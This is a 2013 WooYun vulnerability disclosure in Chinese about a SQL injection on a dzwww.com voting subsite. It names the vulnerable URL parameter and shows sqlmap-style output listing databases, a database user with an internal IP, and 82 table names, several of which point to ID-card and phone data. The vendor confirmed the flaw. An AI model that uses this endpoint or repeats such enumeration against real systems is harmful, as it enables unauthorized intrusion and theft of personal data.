漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-040147
漏洞标题:大众网#某分站sql注入漏洞一枚
相关厂商:大众网
漏洞作者: 爱上平顶山
提交时间:2013-10-18 09:19
修复时间:2013-12-02 09:19
公开时间:2013-12-02 09:19
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:10
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-10-18: 细节已通知厂商并且等待厂商处理中
2013-10-18: 厂商已经确认,细节仅向厂商公开
2013-10-28: 细节向核心白帽子及相关领域专家公开
2013-11-07: 细节向普通白帽子公开
2013-11-17: 细节向实习白帽子公开
2013-12-02: 细节向公众公开
简要描述:
0.0
详细说明:
大众网
点:http://tp.dzwww.com/zhuanti/sdtyn/index.jsp?group=2
其他自测
信息:
web application technology: JSP
back-end DBMS: MySQL 5.0
[09:05:25] [INFO] fetching database names
[09:05:25] [INFO] the SQL query used returns 2 entries
[09:05:25] [INFO] retrieved: information_schema
[09:05:26] [INFO] retrieved: dzvote
available databases [2]:
[*] dzvote
[*] information_schema
web application technology: JSP
back-end DBMS: MySQL 5.0
[09:06:09] [INFO] retrieved: 'dzvote'@'172.19.2.40'
database management system users [1]:
[*] 'dzvote'@'172.19.2.40'
表比较多。
Database: dzvote
[82 tables]
+---------------------------+
| app_child |
| app_child_user |
| app_handle_info |
| app_hh_msg |
| app_hh_phone |
| app_phone |
| app_random |
| app_temp_user |
| app_tydm |
| app_vote_admin |
| app_vote_admin_user |
| app_vote_analysis |
| app_vote_bip |
| app_vote_bl |
| app_vote_blr |
| app_vote_calling |
| app_vote_cooper |
| app_vote_house_user |
| app_vote_hzfx |
| app_vote_idcard |
| app_vote_idcard11 |
| app_vote_indexpic |
| app_vote_info |
| app_vote_info_delete |
| app_vote_info_jndt |
| app_vote_ip |
| app_vote_ip20120528 |
| app_vote_ip20130909 |
| app_vote_ip_load |
| app_vote_ivr |
| app_vote_ivr_temp |
| app_vote_ivr_temp20120601 |
| app_vote_ivr_temp20121119 |
| app_vote_ivr_temp20130114 |
| app_vote_jnsdqn |
| app_vote_koupiao |
| app_vote_log |
| app_vote_logo |
| app_vote_lottery |
| app_vote_mac |
| app_vote_message |
| app_vote_mlcz |
| app_vote_name |
| app_vote_news |
| app_vote_obj |
| app_vote_orders |
| app_vote_other_temp |
| app_vote_partner |
| app_vote_phone |
| app_vote_seidcard |
| app_vote_sign |
| app_vote_skin |
| app_vote_sms |
| app_vote_sms_limit |
| app_vote_sms_temp |
| app_vote_sms_temp20111109 |
| app_vote_sms_temp20120601 |
| app_vote_sms_temp20121119 |
| app_vote_sms_temp20130114 |
| app_vote_subject |
| app_vote_subject_news |
| app_vote_template |
| app_vote_tuopiao |
| app_vote_tuopiao_old |
| app_vote_use_temp |
| app_vote_user |
| app_vote_user_test |
| app_vote_wall |
| app_vote_web |
| app_vote_web_limit |
| app_vote_web_temp |
| app_vote_web_temp20120813 |
| app_vote_web_temp20120820 |
| app_vote_web_temp20121012 |
| app_vote_web_temp20130828 |
| app_vote_web_temp20130909 |
| app_vote_web_temp20130928 |
| app_vote_web_temp_load |
| app_vote_webconfig |
| tChkDBCon |
| tchkdbcon |
| zcr_phone |
+---------------------------+
ok
漏洞证明:
Database: dzvote
[82 tables]
+---------------------------+
| app_child |
| app_child_user |
| app_handle_info |
| app_hh_msg |
| app_hh_phone |
| app_phone |
| app_random |
| app_temp_user |
| app_tydm |
| app_vote_admin |
| app_vote_admin_user |
| app_vote_analysis |
| app_vote_bip |
| app_vote_bl |
| app_vote_blr |
| app_vote_calling |
| app_vote_cooper |
| app_vote_house_user |
| app_vote_hzfx |
| app_vote_idcard |
| app_vote_idcard11 |
| app_vote_indexpic |
| app_vote_info |
| app_vote_info_delete |
| app_vote_info_jndt |
| app_vote_ip |
| app_vote_ip20120528 |
| app_vote_ip20130909 |
| app_vote_ip_load |
| app_vote_ivr |
| app_vote_ivr_temp |
| app_vote_ivr_temp20120601 |
| app_vote_ivr_temp20121119 |
| app_vote_ivr_temp20130114 |
| app_vote_jnsdqn |
| app_vote_koupiao |
| app_vote_log |
| app_vote_logo |
| app_vote_lottery |
| app_vote_mac |
| app_vote_message |
| app_vote_mlcz |
| app_vote_name |
| app_vote_news |
| app_vote_obj |
| app_vote_orders |
| app_vote_other_temp |
| app_vote_partner |
| app_vote_phone |
| app_vote_seidcard |
| app_vote_sign |
| app_vote_skin |
| app_vote_sms |
| app_vote_sms_limit |
| app_vote_sms_temp |
| app_vote_sms_temp20111109 |
| app_vote_sms_temp20120601 |
| app_vote_sms_temp20121119 |
| app_vote_sms_temp20130114 |
| app_vote_subject |
| app_vote_subject_news |
| app_vote_template |
| app_vote_tuopiao |
| app_vote_tuopiao_old |
| app_vote_use_temp |
| app_vote_user |
| app_vote_user_test |
| app_vote_wall |
| app_vote_web |
| app_vote_web_limit |
| app_vote_web_temp |
| app_vote_web_temp20120813 |
| app_vote_web_temp20120820 |
| app_vote_web_temp20121012 |
| app_vote_web_temp20130828 |
| app_vote_web_temp20130909 |
| app_vote_web_temp20130928 |
| app_vote_web_temp_load |
| app_vote_webconfig |
| tChkDBCon |
| tchkdbcon |
| zcr_phone |
+---------------------------+
修复方案:
过滤。
版权声明:转载请注明来源 爱上平顶山@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2013-10-18 10:48
厂商回复:
已确认问题存在,感谢 山山提供信息。 努力各种姿势修复中。
最新状态:
暂无